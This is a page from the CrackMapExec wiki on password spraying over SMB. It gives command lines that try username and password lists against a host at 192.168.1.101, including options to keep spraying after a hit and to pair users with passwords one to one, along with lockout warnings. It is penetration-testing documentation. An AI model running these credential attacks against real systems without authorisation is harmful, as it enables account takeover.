πŸ”±
πŸ”±
πŸ”±
πŸ”±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2@byt3bl33d3r@mpgn_x64
Search…
Introduction
πŸ”₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
πŸ†•
BloodHound integration
Report bugs or new features
πŸ’²
Audit Mode
SMB protocol
πŸ†•
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
πŸ†•
Defeating LAPS
πŸ†•
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
πŸ†•
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
πŸ’²
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
πŸ’²
RDP Protocol
Password spraying
Install aardwolf lib
Powered By GitBook
Password spraying
Using CrackMapExec for password spraying

Using Username/Password Lists

You can use multiple usernames or passwords by seperating the names/passwords with a space.
1
#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
2
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
Copied!
CME accepts txt files of usernames and passwords. One user/password per line. Watch out for account lockout!
1
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
2
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
Copied!
By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list Usage example:
1
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
Copied!

Checking login == password using wordlist

1
#~ cme smb 192.168.1.101 -u user.txt -p user.txt
Copied!

Checking multiple usernames/passwords using worlist

1
#~ cme smb 192.168.1.101 -u user.txt -p password.txt
Copied!
The result will be:
  • user1 => password1
  • user1 => password2
  • user2 => password1
  • user2 => password2
Be careful to not lock accounts using this technique

Checking one login equal one password using wordlist

No bruteforce possible with this one as 1 user = 1 password
1
#~ cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-succes
Copied!
The result will be:
  • user1 => password1
  • user2 => password2
Avoid range or a list of IP when using option --no-bruteforce
Previous
Enumerate host with SMB signing not required
Next - SMB protocol
Authentication
Last modified 1yr ago
Copy link
Contents
Using Username/Password Lists
Checking login == password using wordlist
Checking multiple usernames/passwords using worlist
Checking one login equal one password using wordlist